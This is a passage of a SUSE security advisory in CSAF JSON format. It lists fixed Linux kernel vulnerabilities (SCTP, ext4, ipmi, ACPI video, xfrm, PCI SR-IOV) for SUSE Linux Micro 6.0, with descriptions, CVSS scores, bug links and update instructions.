"category": "external",
"summary": "SUSE Bug 1253442 for CVE-2025-40179",
"url": "https://bugzilla.suse.com/1253442"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.7,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40179"
},
{
"cve": "CVE-2025-40187",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40187"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet/sctp: fix a null dereference in sctp_disposition sctp_sf_do_5_1D_ce()\n\nIf new_asoc-\u003epeer.adaptation_ind=0 and sctp_ulpevent_make_authkey=0\nand sctp_ulpevent_make_authkey() returns 0, then the variable\nai_ev remains zero and the zero will be dereferenced\nin the sctp_ulpevent_free() function.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40187",
"url": "https://www.suse.com/security/cve/CVE-2025-40187"
},
{
"category": "external",
"summary": "SUSE Bug 1253647 for CVE-2025-40187",
"url": "https://bugzilla.suse.com/1253647"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 4.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40187"
},
{
"cve": "CVE-2025-40190",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40190"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\next4: guard against EA inode refcount underflow in xattr update\n\nsyzkaller found a path where ext4_xattr_inode_update_ref() reads an EA\ninode refcount that is already \u003c= 0 and then applies ref_change (often\n-1). That lets the refcount underflow and we proceed with a bogus value,\ntriggering errors like:\n\n EXT4-fs error: EA inode \u003cn\u003e ref underflow: ref_count=-1 ref_change=-1\n EXT4-fs warning: ea_inode dec ref err=-117\n\nMake the invariant explicit: if the current refcount is non-positive,\ntreat this as on-disk corruption, emit ext4_error_inode(), and fail the\noperation with -EFSCORRUPTED instead of updating the refcount. Delete the\nWARN_ONCE() as negative refcounts are now impossible; keep error reporting\nin ext4_error_inode().\n\nThis prevents the underflow and the follow-on orphan/cleanup churn.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40190",
"url": "https://www.suse.com/security/cve/CVE-2025-40190"
},
{
"category": "external",
"summary": "SUSE Bug 1253623 for CVE-2025-40190",
"url": "https://bugzilla.suse.com/1253623"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40190"
},
{
"cve": "CVE-2025-40202",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40202"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nipmi: Rework user message limit handling\n\nThe limit on the number of user messages had a number of issues,\nimproper counting in some cases and a use after free.\n\nRestructure how this is all done to handle more in the receive message\nallocation routine, so all refcouting and user message limit counts\nare done in that routine. It\u0027s a lot cleaner and safer.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40202",
"url": "https://www.suse.com/security/cve/CVE-2025-40202"
},
{
"category": "external",
"summary": "SUSE Bug 1253451 for CVE-2025-40202",
"url": "https://bugzilla.suse.com/1253451"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40202"
},
{
"cve": "CVE-2025-40211",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40211"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nACPI: video: Fix use-after-free in acpi_video_switch_brightness()\n\nThe switch_brightness_work delayed work accesses device-\u003ebrightness\nand device-\u003ebacklight, freed by acpi_video_dev_unregister_backlight()\nduring device removal.\n\nIf the work executes after acpi_video_bus_unregister_backlight()\nfrees these resources, it causes a use-after-free when\nacpi_video_switch_brightness() dereferences device-\u003ebrightness or\ndevice-\u003ebacklight.\n\nFix this by calling cancel_delayed_work_sync() for each device\u0027s\nswitch_brightness_work in acpi_video_bus_remove_notify_handler()\nafter removing the notify handler that queues the work. This ensures\nthe work completes before the memory is freed.\n\n[ rjw: Changelog edit ]",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40211",
"url": "https://www.suse.com/security/cve/CVE-2025-40211"
},
{
"category": "external",
"summary": "SUSE Bug 1254126 for CVE-2025-40211",
"url": "https://bugzilla.suse.com/1254126"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "moderate"
}
],
"title": "CVE-2025-40211"
},
{
"cve": "CVE-2025-40215",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40215"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nxfrm: delete x-\u003etunnel as we delete x\n\nThe ipcomp fallback tunnels currently get deleted (from the various\nlists and hashtables) as the last user state that needed that fallback\nis destroyed (not deleted). If a reference to that user state still\nexists, the fallback state will remain on the hashtables/lists,\ntriggering the WARN in xfrm_state_fini. Because of those remaining\nreferences, the fix in commit f75a2804da39 (\"xfrm: destroy xfrm_state\nsynchronously on net exit path\") is not complete.\n\nWe recently fixed one such situation in TCP due to defered freeing of\nskbs (commit 9b6412e6979f (\"tcp: drop secpath at the same time as we\ncurrently drop dst\")). This can also happen due to IP reassembly: skbs\nwith a secpath remain on the reassembly queue until netns\ndestruction. If we can\u0027t guarantee that the queues are flushed by the\ntime xfrm_state_fini runs, there may still be references to a (user)\nxfrm_state, preventing the timely deletion of the corresponding\nfallback state.\n\nInstead of chasing each instance of skbs holding a secpath one by one,\nthis patch fixes the issue directly within xfrm, by deleting the\nfallback state as soon as the last user state depending on it has been\ndeleted. Destruction will still happen when the final reference is\ndropped.\n\nA separate lockdep class for the fallback state is required since\nwe\u0027re going to lock x-\u003etunnel while x is locked.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40215",
"url": "https://www.suse.com/security/cve/CVE-2025-40215"
},
{
"category": "external",
"summary": "SUSE Bug 1254959 for CVE-2025-40215",
"url": "https://bugzilla.suse.com/1254959"
},
{
"category": "external",
"summary": "SUSE Bug 1255054 for CVE-2025-40215",
"url": "https://bugzilla.suse.com/1255054"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-02-24T10:42:46Z",
"details": "important"
}
],
"title": "CVE-2025-40215"
},
{
"cve": "CVE-2025-40219",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2025-40219"
}
],
"notes": [
{
"category": "general",
"text": "In the Linux kernel, the following vulnerability has been resolved:\n\nPCI/IOV: Add PCI rescan-remove locking when enabling/disabling SR-IOV\n\nBefore disabling SR-IOV via config space accesses to the parent PF,\nsriov_disable() first removes the PCI devices representing the VFs.\n\nSince commit 9d16947b7583 (\"PCI: Add global pci_lock_rescan_remove()\")\nsuch removal operations are serialized against concurrent remove and\nrescan using the pci_rescan_remove_lock. No such locking was ever added\nin sriov_disable() however. In particular when commit 18f9e9d150fc\n(\"PCI/IOV: Factor out sriov_add_vfs()\") factored out the PCI device\nremoval into sriov_del_vfs() there was still no locking around the\npci_iov_remove_virtfn() calls.\n\nOn s390 the lack of serialization in sriov_disable() may cause double\nremove and list corruption with the below (amended) trace being observed:\n\n PSW: 0704c00180000000 0000000c914e4b38 (klist_put+56)\n GPRS: 000003800313fb48 0000000000000000 0000000100000001 0000000000000001\n\t00000000f9b520a8 0000000000000000 0000000000002fbd 00000000f4cc9480\n\t0000000000000001 0000000000000000 0000000000000000 0000000180692828\n\t00000000818e8000 000003800313fe2c 000003800313fb20 000003800313fad8\n #0 [3800313fb20] device_del at c9158ad5c\n #1 [3800313fb88] pci_remove_bus_device at c915105ba\n #2 [3800313fbd0] pci_iov_remove_virtfn at c9152f198\n #3 [3800313fc28] zpci_iov_remove_virtfn at c90fb67c0\n #4 [3800313fc60] zpci_bus_remove_device at c90fb6104\n #5 [3800313fca0] __zpci_event_availability at c90fb3dca\n #6 [3800313fd08] chsc_process_sei_nt0 at c918fe4a2\n #7 [3800313fd60] crw_collect_info at c91905822\n #8 [3800313fe10] kthread at c90feb390\n #9 [3800313fe68] __ret_from_fork at c90f6aa64\n #10 [3800313fe98] ret_from_fork at c9194f3f2.\n\nThis is because in addition to sriov_disable() removing the VFs, the\nplatform also generates hot-unplug events for the VFs. This being the\nreverse operation to the hotplug events generated by sriov_enable() and\nhandled via pdev-\u003eno_vf_scan. And while the event processing takes\npci_rescan_remove_lock and checks whether the struct pci_dev still exists,\nthe lack of synchronization makes this checking racy.\n\nOther races may also be possible of course though given that this lack of\nlocking persisted so long observable races seem very rare. Even on s390 the\nlist corruption was only observed with certain devices since the platform\nevents are only triggered by config accesses after the removal, so as long\nas the removal finished synchronously they would not race. Either way the\nlocking is missing so fix this by adding it to the sriov_del_vfs() helper.\n\nJust like PCI rescan-remove, locking is also missing in sriov_add_vfs()\nincluding for the error case where pci_stop_and_remove_bus_device() is\ncalled without the PCI rescan-remove lock being held. Even in the non-error\ncase, adding new PCI devices and buses should be serialized via the PCI\nrescan-remove lock. Add the necessary locking.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2025-40219",
"url": "https://www.suse.com/security/cve/CVE-2025-40219"
},
{
"category": "external",
"summary": "SUSE Bug 1254518 for CVE-2025-40219",
"url": "https://bugzilla.suse.com/1254518"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-livepatch-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-devel-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-kvmsmall-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-macros-6.4.0-39.1.noarch",
"SUSE Linux Micro 6.0:kernel-source-6.4.0-39.1.noarch"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:H",
"version": "3.1"
},
"products": [
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.aarch64",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.s390x",
"SUSE Linux Micro 6.0:kernel-default-6.4.0-39.1.x86_64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.aarch64",
"SUSE Linux Micro 6.0:kernel-default-base-6.4.0-39.1.21.16.x86_64",
